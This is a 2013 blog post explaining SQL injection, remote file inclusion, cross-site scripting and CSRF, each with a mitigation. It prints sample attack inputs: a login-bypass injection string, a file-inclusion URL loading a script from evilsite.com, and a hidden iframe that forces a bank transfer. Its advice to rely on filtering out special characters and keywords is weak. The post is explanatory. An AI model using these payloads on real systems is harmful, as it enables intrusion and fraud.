RSS

Some of the most common web application vulnerabilities..

26 Feb

In this post I am listing some of the most common web application vulnerabilities, and the mitigation strategy for each.

  • SQl  Injection Flaws.

It is a kind of attack in which untrusted data is sent to the interpreter as part of a query.The principal behind SQL injection is pretty simple. When an application takes user data as an input, there is an opportunity for a malicious user to enter carefully crafted data that causes the input to be interpreted as part of a SQL query instead of data.

Consider the following piece of code:

SELECT * FROM Users WHERE Username='$username' AND Password='$password' 

This query is supposed to show all field from the table Users if the username and password matches.

However it is possible for an attacker to exploit the vulnerability in this piece of code. Suppose the attacker gives the following entry for both username and password:

Username=1' or '1' = '1       Password=1' or '1' = '1

resulting in the query:

SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'

Now it is very obvious that since ’1′=’1′ always return true, the authentication process is very easily bypassed

The most effective mitigation strategy would be to perform input data sanitization and data validation.

By data sanitization what is meant is to use some kind of function that runs the input data to  ensure that the queryt data does not consist of any special, dangerous characters such as   ” ‘ ”   or  ” ; ”  or  ” –”    etc.

Data validation on the other hand is meant to ensure that the query is in a form that is expected.

  • File Inclusin Attacks

There are two types of file inclusion attacks

  1. Remote File Inclusion
  2. Local File Inclusion

Remote File Inclusion or RFI attacks are the most common and dangerous of both.

With this attack type, an attacker can injec a remote file into the server, and the contents of the file wreak havoc on the server according to what the hacker coded. Some remote file inclusion attacks just add a random string of text to the website, while others can cause something more malicious, such  data theft, or further vulnerabilities on the website.

All websites are made up of many files — for images, coding and other features. If the administrator does not include validation rules that check for incoming files, then a remote file inclusion is one of the easiest attacks for a hacker to perform. The hacker just has to manipulate the website address to trick it into including a new file, and the remote file will be uploaded to the server.

Consider the following:

http://vulnerable_site.com/index.php?page=home

This is done to pull the documents stored in the server and display it to the user. Now, it is possible to perform file inclusion by executing something like this if the input is not properly validated:

http://vulnerable_site.com/index.php?page=htttp://evilsite.com/malicious_script.txt

Like all code injection attacks, RFI is a result of allowing unsecure data into a secure context. The best way to prevent an RFI attack is to never use arbitrary input data in a literal file include request.

  • Cross Site Scripting Attacks (XSS)

Cross-site scripting refers to that hacking technique that leverages vulnerabilities in the code of a web application to allow an attacker to send malicious content from an end-user and collect some type of data from the victim.

Many times the hacker will use the ‘comments’ feature of a web page to insert a comment that contains a script. Every user who views that comment will download the script which will execute on his browser, causing undesirable behaviour. Something as simple as a Tweet  can contain a malicious script, which if not filtered by the Twitter servers will be injected into your Wall and execute on the browser of every person who visits that profile.

The simplest and the easiest form of XSS protection would be to pass all external data through a filter which will remove dangerous keywords, such as the  <SCRIPT> tag, JavaScript commands, CSS styles and other dangerous HTML markup.

Escaping from XSS

This is the primary means to disable an XSS attack. When performing Escaping you are effectively telling the browser that the data being sent should be treated as data and should not be interpreted in any other way. If an attacker manages to put a script on a web  page, the victim will not be affected because the browser will not execute the script if it is properly escaped.

  • cross site request forgery (csrf)

CSRF is an attack  whereby a malicious website will send a request to a web application that a user is already authenticated against from a different website. This way an attacker can access functionality in a target web application via the victim’s already authenticated browser. Targets include web applications like social media, in browser email clients, online banking.

This is how it works, suppose a user is logged into the website of a bank he is banking with, say, abcd_bank.com. At the same time on another browser he has opened some malicious website, say evilsite.com. Now this evilsite.com is  planning to attack people banking with abcd_bank.com and have setup a CSRF attack on their site. Now he can include some malicious code like

<iframe src="http://abcd_bank.com/app/transferFunds?amount=1500&destinationAccount=123456789" >

As a result 1500 rs will be transferred to the account 123456789, which obviously belongs to the attacker.

The most common method to prevent Cross-Site Request Forgery (CSRF) attacks is to append unpredictable challenge tokens to each request and associate them with the user’s session. Such tokens should at a minimum be unique per user session, but can also be unique per request. By including a challenge token with each request, the developer can ensure that the request is valid and not coming from another source other than the user.

 

 

About these ads
 
1 Comment

Posted by on February 26, 2013 in Network Security

 

One response to “Some of the most common web application vulnerabilities..

  1. Cygnis Media

    June 26, 2013 at 9:55 am

    The key to identify vulnerabilities that could potentially be exploited is to first understand the categories of vulnerabilities. One of the techniques used for this process is buffer overflows. It’s also important for QA professionals to understand the automated and manual techniques that can be employed to gain a more holistic view of the vulnerability profile within a specific application.

     

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

 
Follow

Get every new post delivered to your Inbox.

%d bloggers like this: